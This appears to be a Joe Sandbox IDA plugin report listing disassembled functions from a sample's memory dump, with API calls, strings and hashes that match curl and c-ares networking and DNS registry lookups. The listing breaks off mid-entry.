Opcode ID: d532bb9b19b3bf89a46640998cd6128b2587b66fa3619828ece4a3c418d78dcb
Instruction ID: 06a32ddf1d67ed26f8b7282f37474dd753b9124e29fe5e27face0446cd1a1712
Opcode Fuzzy Hash: d532bb9b19b3bf89a46640998cd6128b2587b66fa3619828ece4a3c418d78dcb
Instruction Fuzzy Hash: C9F06D7510830CAFD2209E01EC85E6BBBEDEFC9758F05456DF958232118271AE11CAB2

Function 00EBA440 Relevance: 44.8, APIs: 17, Strings: 8, Instructions: 1066registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExA.KERNELBASE(80000002,System\CurrentControlSet\Services\Tcpip\Parameters,00000000,00020019,?), ref: 00EBAA19
RegQueryValueExA.KERNELBASE(?,SearchList,00000000,00000000,00000000,00000000), ref: 00EBAA4C
RegQueryValueExA.KERNELBASE(?,SearchList,00000000,00000000,00000000,?), ref: 00EBAA97
RegQueryValueExA.KERNELBASE(?,Domain,00000000,00000000,00000000,00000000), ref: 00EBAAE9
RegQueryValueExA.KERNELBASE(?,Domain,00000000,00000000,00000000,?), ref: 00EBAB30
RegCloseKey.KERNELBASE(?), ref: 00EBAB6A
RegOpenKeyExA.KERNELBASE(80000002,Software\Policies\Microsoft\Windows NT\DNSClient,00000000,00020019,?), ref: 00EBAB82
RegOpenKeyExA.KERNELBASE(80000002,Software\Policies\Microsoft\System\DNSClient,00000000,00020019,?), ref: 00EBAC46
RegOpenKeyExA.KERNELBASE(80000002,System\CurrentControlSet\Services\Tcpip\Parameters\Interfaces,00000000,00020019,?), ref: 00EBAD0A
RegEnumKeyExA.KERNELBASE ref: 00EBAD8D
RegCloseKey.KERNELBASE(?), ref: 00EBADD9
RegEnumKeyExA.KERNELBASE ref: 00EBAE08
RegOpenKeyExA.KERNELBASE(?,?,00000000,00000001,?), ref: 00EBAE2A
RegQueryValueExA.KERNELBASE(?,SearchList,00000000,00000000,00000000,00000000), ref: 00EBAE54
RegQueryValueExA.KERNELBASE(?,Domain,00000000,00000000,00000000,00000000), ref: 00EBAF63
RegQueryValueExA.KERNELBASE(?,Domain,00000000,00000000,00000000,?), ref: 00EBAFB2
RegQueryValueExA.KERNELBASE(?,DhcpDomain,00000000,00000000,00000000,00000000), ref: 00EBB072

Strings

System\CurrentControlSet\Services\Tcpip\Parameters\Interfaces, xrefs: 00EBAD00
PrimaryDNSSuffix, xrefs: 00EBAC6B, 00EBACAE
Software\Policies\Microsoft\System\DNSClient, xrefs: 00EBAC3C
DhcpDomain, xrefs: 00EBB06C, 00EBB0BB
Domain, xrefs: 00EBAAE3, 00EBAB2A, 00EBAF5D, 00EBAFAC
Software\Policies\Microsoft\Windows NT\DNSClient, xrefs: 00EBAB78
SearchList, xrefs: 00EBAA46, 00EBAA91, 00EBABA7, 00EBABEA, 00EBAE4E, 00EBAE9D
System\CurrentControlSet\Services\Tcpip\Parameters, xrefs: 00EBAA0F

Memory Dump Source

Source File: 00000000.00000002.1482231895.0000000000E01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true

Associated: 00000000.00000002.1482210725.0000000000E00000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1482231895.0000000001371000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1482231895.00000000014D7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1482231895.00000000014D9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1482729721.00000000014DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1482751437.00000000014DE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1482751437.0000000001666000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1482751437.0000000001780000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1482751437.0000000001788000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1482751437.0000000001861000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1482751437.000000000186A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1482751437.0000000001878000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1483178913.0000000001879000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1483522316.0000000001A34000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1483546609.0000000001A36000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e00000_HGFSqmKwd5.jbxd

Similarity

API ID: QueryValue$Open$CloseEnum
String ID: DhcpDomain$Domain$PrimaryDNSSuffix$SearchList$Software\Policies\Microsoft\System\DNSClient$Software\Policies\Microsoft\Windows NT\DNSClient$System\CurrentControlSet\Services\Tcpip\Parameters$System\CurrentControlSet\Services\Tcpip\Parameters\Interfaces
API String ID: 4217438148-1047472027
Opcode ID: f94029af383c36620c8f64ddb2727ad3e6d9d4cbabd4b28eb854dc25e52439f6
Instruction ID: dba718ea37d6346205b3cf13a9d5c44fca9a7fb4e5ac900b31626c6b6d7457e2
Opcode Fuzzy Hash: f94029af383c36620c8f64ddb2727ad3e6d9d4cbabd4b28eb854dc25e52439f6
Instruction Fuzzy Hash: 5D72BFB1604301AFE720DB24DD81BABB7E8AF85704F18582CF985E72A1E775E944CB53

Function 00E3A550 Relevance: 28.8, APIs: 1, Strings: 15, Instructions: 794COMMON

Download Yara Rule

APIs

setsockopt.WS2_32(?,00000006,00000001,00000001,00000004), ref: 00E3A831

Strings

Couldn't bind to '%s' with errno %d: %s, xrefs: 00E3AE1F
cf-socket.c, xrefs: 00E3A5CD, 00E3A735
Could not set TCP_NODELAY: %s, xrefs: 00E3A871
Couldn't bind to interface '%s' with errno %d: %s, xrefs: 00E3AD0A
@, xrefs: 00E3A8F4
sa_addr inet_ntop() failed with errno %d: %s, xrefs: 00E3A6CE
Trying [%s]:%d..., xrefs: 00E3A689
Local Interface %s is ip %s using address family %i, xrefs: 00E3AE60
bind failed with errno %d: %s, xrefs: 00E3B080
Bind to local port %d failed, trying next, xrefs: 00E3AFE5
Local port: %hu, xrefs: 00E3AF28
Trying %s:%d..., xrefs: 00E3A7C2, 00E3A7DE
@, xrefs: 00E3AC42
cf_socket_open() -> %d, fd=%d, xrefs: 00E3A796
Name '%s' family %i resolved to '%s' family %i, xrefs: 00E3ADAC

Memory Dump Source

Source File: 00000000.00000002.1482231895.0000000000E01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true

Associated: 00000000.00000002.1482210725.0000000000E00000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1482231895.0000000001371000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1482231895.00000000014D7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1482231895.00000000014D9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1482729721.00000000014DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1482751437.00000000014DE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1482751437.0000000001666000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1482751437.0000000001780000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1482751437.0000000001788000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1482751437.0000000001861000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1482751437.000000000186A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1482751437.0000000001878000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1483178913.0000000001879000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1483522316.0000000001A34000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1483546609.0000000001A36000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e00000_HGFSqmKwd5.jbxd

Similarity

API ID: setsockopt
String ID: Trying %s:%d...$ Trying [%s]:%d...$ @$ @$Bind to local port %d failed, trying next$Could not set TCP_NODELAY: %s$Couldn't bind to '%s' with errno %d: %s$Couldn't bind to interface '%s' with errno %d: %s$Local Interface %s is ip %s using address family %i$Local port: %hu$Name '%s' family %i resolved to '%s' family %i$bind failed with errno %d: %s$cf-socket.c$cf_socket_open() -> %d, fd=%d$sa_addr inet_ntop() failed with errno %d: %s
API String ID: 3981526788-2373386790
Opcode ID: 4aaccaa0a574a993972bec4f1409994b707322c072810d68519bcd0c1a36d960
Instruction ID: c7dcf72d84b79b62125e00649c830684d2f42fd498cb1734f3701977b1bef629
Opcode Fuzzy Hash: 4aaccaa0a574a993972bec4f1409994b707322c072810d68519bcd0c1a36d960
Instruction Fuzzy Hash: 1562F871504341ABD720DF14D84ABABBBF5BF91318F08652DF98867292E771E884CB93

Function 00EC9740 Relevance: 18.2, APIs: 3, Strings: 7, Instructions: 743
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RegOpenKeyExA.KERNELBASE(80000002,System\CurrentControlSet\Services\Tcpip\Parameters,00000000,00020019,?), ref: 00EC9946
RegQueryValueExA.KERNELBASE(?,DatabasePath,00000000,00000000,?,00000104), ref: 00EC9974
RegCloseKey.KERNELBASE(?), ref: 00EC998B

Strings

CARES_HOSTS, xrefs: 00EC9788
DatabasePath, xrefs: 00EC996B
sts, xrefs: 00EC99A2
\hos, xrefs: 00EC999A
#, xrefs: 00EC9A3F
System\CurrentControlSet\Services\Tcpip\Parameters, xrefs: 00EC993C
#, xrefs: 00EC9B9D

Memory Dump Source

Source File: 00000000.00000002.1482231895.0000000000E01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true

Associated: 00000000.00000002.1482210725.0000000000E00000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1482231895.0000000001371000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1482231895.00000000014D7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1482231895.00000000014D9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1482729721.00000000014DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1482751437.00000000014DE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1482751437.0000000001666000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1482751437.0000000001780000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1482751437.0000000001788000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1482751437.0000000001861000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1482751437.000000000186A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1482751437.0000000001878000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1483178913.0000000001879000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1483522316.0000000001A34000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1483546609.0000000001A36000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e00000_HGFSqmKwd5.jbxd

Similarity

API ID: CloseOpenQueryValue
String ID: #$#$CARES_HOSTS$DatabasePath$System\CurrentControlSet\Services\Tcpip\Parameters$\hos$sts
API String ID: 3677997916-4129964100
Opcode ID: c410ed2e3ae55c3f9bb2e7987b38d255e5de165f9ac6d9f2ab9d89ca9a8ea423
Instruction ID: 657042364e1cb0003c01ec5e993e8bb2f59c275b7a9539c3442266ffa8818fb7
Opcode Fuzzy Hash: c410ed2e3ae55c3f9bb2e7987b38d255e5de165f9ac6d9f2ab9d89ca9a8ea423
Instruction Fuzzy Hash: 3E32B9B59002019BEB11AB24AE46F9B76D4AF54318F08543CF84AB6363F732E916C793

Function 00E38B50 Relevance: 12.5, APIs: 2, Strings: 5, Instructions: 269
networkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

connect.WS2_32(?,?,00000001), ref: 00E38C30
SleepEx.KERNELBASE(00000000,00000000), ref: 00E38CF3

Strings

local address %s port %d..., xrefs: 00E38C7F
cf-socket.c, xrefs: 00E38EDF
connected, xrefs: 00E38DA7
not connected yet, xrefs: 00E38BDC
connect to %s port %u from %s port %d failed: %s, xrefs: 00E38E78

Memory Dump Source

Source File: 00000000.00000002.1482231895.0000000000E01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true

Associated: 00000000.00000002.1482210725.0000000000E00000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1482231895.0000000001371000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1482231895.00000000014D7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1482231895.00000000014D9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1482729721.00000000014DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1482751437.00000000014DE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1482751437.0000000001666000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1482751437.0000000001780000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1482751437.0000000001788000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1482751437.0000000001861000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1482751437.000000000186A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1482751437.0000000001878000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1483178913.0000000001879000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1483522316.0000000001A34000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1483546609.0000000001A36000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e00000_HGFSqmKwd5.jbxd

Similarity

API ID: Sleepconnect
String ID: cf-socket.c$connect to %s port %u from %s port %d failed: %s$connected$local address %s port %d...$not connected yet
API String ID: 238548546-879669977
Opcode ID: 294d764f9bee852ae1df8bf313e2d47c61134d8e614810ca6e1f27cb7730ca15
Instruction ID: f56edf27fbd79476d09bdcb8add1f170e1a578e57c1038ccd923acb00cba5e51
Opcode Fuzzy Hash: 294d764f9bee852ae1df8bf313e2d47c61134d8e614810ca6e1f27cb7730ca15
Instruction Fuzzy Hash: C9B1D4746043069FDB10DF24CE89BA6BBE4AF85318F04A62CF859672D2DB70EC44C762

Function 00E02F17 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 144
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RegOpenKeyExA.KERNELBASE ref: 00E02FED
RegEnumKeyExA.KERNELBASE ref: 00E031A5

Strings

d, xrefs: 00E02FA0

Memory Dump Source

Source File: 00000000.00000002.1482231895.0000000000E01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true

Associated: 00000000.00000002.1482210725.0000000000E00000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1482231895.0000000001371000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1482231895.00000000014D7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1482231895.00000000014D9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1482729721.00000000014DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1482751437.00000000014DE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1482751437.0000000001666000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1482751437.0000000001780000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1482751437.0000000001788000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1482751437.0000000001861000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1482751437.000000000186A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1482751437.0000000001878000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1483178913.0000000001879000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1483522316.0000000001A34000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1483546609.0000000001A36000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e00000_HGFSqmKwd5.jbxd

Similarity

API ID: EnumOpen
String ID: d
API String ID: 3231578192-2564639436
Opcode ID: 37a520151b4d3f91a09cc97b19e301725b9e59309e0f744136628cc3aeabe917
Instruction ID: f4ae250d7966eae1dff9f59faf30d1ee317fc208cfcebc272e7d20847ce96644
Opcode Fuzzy Hash: 37a520151b4d3f91a09cc97b19e301725b9e59309e0f744136628cc3aeabe917
Instruction Fuzzy Hash: 197194B490531A9FDB10EF69D58479EBBF4BF84308F10895DE898A7340D7749A88CF92

Function 00E076A0 Relevance: 10.6, APIs: 1, Strings: 5, Instructions: 73
networkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

send.WS2_32(multi.c,?,?,?,N=,00000000,?,?,00E107BF), ref: 00E076EB

Strings

LIMIT %s:%d %s reached memlimit, xrefs: 00E07712, 00E07731
N=, xrefs: 00E076A3
SEND %s:%d send(%lu) = %ld, xrefs: 00E076F8
send, xrefs: 00E0770B, 00E0772A
multi.c, xrefs: 00E076DD, 00E076E9

Memory Dump Source

Source File: 00000000.00000002.1482231895.0000000000E01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true

Associated: 00000000.00000002.1482210725.0000000000E00000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1482231895.0000000001371000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1482231895.00000000014D7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1482231895.00000000014D9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1482729721.00000000014DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1482751437.00000000014DE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1482751437.0000000001666000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1482751437.0000000001780000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1482751437.0000000001788000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1482751437.0000000001861000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1482751437.000000000186A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1482751437.0000000001878000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1483178913.0000000001879000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1483522316.0000000001A34000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1483546609.0000000001A36000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e00000_HGFSqmKwd5.jbxd

Similarity

API ID: send
String ID: LIMIT %s:%d %s reached memlimit$N=$SEND %s:%d send(%lu) = %ld$multi.c$send
API String ID: 2809346765-2907172669
Opcode ID: fadbdf4e23844417aae4837632f9b604057aa3154bde1627ce72fa14ac89f193
Instruction ID: 23dccef51f0839fdaa7c2cd9ee4913196e39b5c3d156806351479c9a51ba8301
Opcode Fuzzy Hash: fadbdf4e23844417aae4837632f9b604057aa3154bde1627ce72fa14ac89f193
Instruction Fuzzy Hash: 66112BF1E193047BD5306B19AC49D27779CEBC2B6CF441918FC5977346D261AC4086B2

Function 00E39290 Relevance: 8.9, APIs: 2, Strings: 3, Instructions: 146
networkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

WSAIoctl.WS2_32(?,4004747B,00000000,00000000,?,00000004,?,00000000,00000000), ref: 00E3935D
setsockopt.WS2_32(?,0000FFFF,00001001,00000000,00000004,?,00000004,?,00000000,00000000), ref: 00E39389

Strings

send(len=%zu) -> %d, err=%d, xrefs: 00E39447
cf-socket.c, xrefs: 00E392CF
Send failure: %s, xrefs: 00E393FB

Memory Dump Source

Source File: 00000000.00000002.1482231895.0000000000E01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true

Associated: 00000000.00000002.1482210725.0000000000E00000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1482231895.0000000001371000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1482231895.00000000014D7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1482231895.00000000014D9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1482729721.00000000014DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1482751437.00000000014DE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1482751437.0000000001666000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1482751437.0000000001780000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1482751437.0000000001788000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1482751437.0000000001861000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1482751437.000000000186A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1482751437.0000000001878000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1483178913.0000000001879000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1483522316.0000000001A34000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1483546609.0000000001A36000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e00000_HGFSqmKwd5.jbxd

Similarity

API ID: Ioctlsetsockopt
String ID: Send failure: %s$cf-socket.c$send(len=%zu) -> %d, err=%d
API String ID: 1903391676-2691795271
Opcode ID: 8db10280d1e54581aabf2f699f6dec5affe2acd58235f674014cf15bf4a567f1
Instruction ID: bce1af10102d1ceb7c41fa7590c00f3291191d9f75bf645d2e5536cf2bf4a134
Opcode Fuzzy Hash: 8db10280d1e54581aabf2f699f6dec5affe2acd58235f674014cf15bf4a567f1
Instruction Fuzzy Hash: 7151F571604305ABD710DF24CC85FAA7BA5FF88318F149528FD58AB283E770E991CB51

Function 00E07770 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 73
networkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

recv.WS2_32(?,?,?,?), ref: 00E077BB

Strings

LIMIT %s:%d %s reached memlimit, xrefs: 00E077E2, 00E07801
recv, xrefs: 00E077DB, 00E077FA
RECV %s:%d recv(%lu) = %ld, xrefs: 00E077C8

Memory Dump Source

Source File: 00000000.00000002.1482231895.0000000000E01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true

Associated: 00000000.00000002.1482210725.0000000000E00000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1482231895.0000000001371000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1482231895.00000000014D7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1482231895.00000000014D9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1482729721.00000000014DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1482751437.00000000014DE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1482751437.0000000001666000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1482751437.0000000001780000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1482751437.0000000001788000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1482751437.0000000001861000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1482751437.000000000186A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1482751437.0000000001878000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1483178913.0000000001879000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1483522316.0000000001A34000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1483546609.0000000001A36000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e00000_HGFSqmKwd5.jbxd

Similarity

API ID: recv
String ID: LIMIT %s:%d %s reached memlimit$RECV %s:%d recv(%lu) = %ld$recv
API String ID: 1507349165-640788491
Opcode ID: 0376675a87b7053417505ccb421654885207223ed5e3b29e6af7e88c8631a1b0
Instruction ID: d0ebce3656d6158f94a7c74b0a571d013d41bd40da519c881c751bc385bd003e
Opcode Fuzzy Hash: 0376675a87b7053417505ccb421654885207223ed5e3b29e6af7e88c8631a1b0
Instruction Fuzzy Hash: B1113AF4E093147BD530AA159C4EE277B9CEBC6BACF44191DF89873395D221AC4086F2

Function 00E075E0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 66
networkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

socket.WS2_32(?,?,?), ref: 00E07619

Strings

socket, xrefs: 00E07643, 00E07662
LIMIT %s:%d %s reached memlimit, xrefs: 00E0764A, 00E07669
FD %s:%d socket() = %d, xrefs: 00E0762E

Memory Dump Source

Source File: 00000000.00000002.1482231895.0000000000E01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true

Associated: 00000000.00000002.1482210725.0000000000E00000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1482231895.0000000001371000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1482231895.00000000014D7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1482231895.00000000014D9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1482729721.00000000014DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1482751437.00000000014DE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1482751437.0000000001666000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1482751437.0000000001780000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1482751437.0000000001788000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1482751437.0000000001861000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1482751437.000000000186A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1482751437.0000000001878000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1483178913.0000000001879000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1483522316.0000000001A34000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1483546609.0000000001A36000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e00000_HGFSqmKwd5.jbxd

Similarity

API ID: socket
String ID: FD %s:%d socket() = %d$LIMIT %s:%d %s reached memlimit$socket
API String ID: 98920635-842387772
Opcode ID: 162aec4fb6fb2ee0df505d514ee81f919ab6281a5320d6803c4104984683a88d
Instruction ID: c6b2e5e29955593fc45df47aa68cf93f75963c1e7990661e95de263efb109d04
Opcode Fuzzy Hash: 162aec4fb6fb2ee0df505d514ee81f919ab6281a5320d6803c4104984683a88d
Instruction Fuzzy Hash: A51129B1E0121177DA316A6D6C0AE8B3B88EB82728F441914F864A23D6D222D89487D1

Function 00E3A150 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 80
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

getsockname.WS2_32(?,?,00000080), ref: 00E3A1C7

Strings

getsockname() failed with errno %d: %s, xrefs: 00E3A1F0
ssloc inet_ntop() failed with errno %d: %s, xrefs: 00E3A23B

Memory Dump Source

Source File: 00000000.00000002.1482231895.0000000000E01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true

Associated: 00000000.00000002.1482210725.0000000000E00000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1482231895.0000000001371000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1482231895.00000000014D7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1482231895.00000000014D9000.00000040.00000001.01000000.00000003.sdmpDownload File
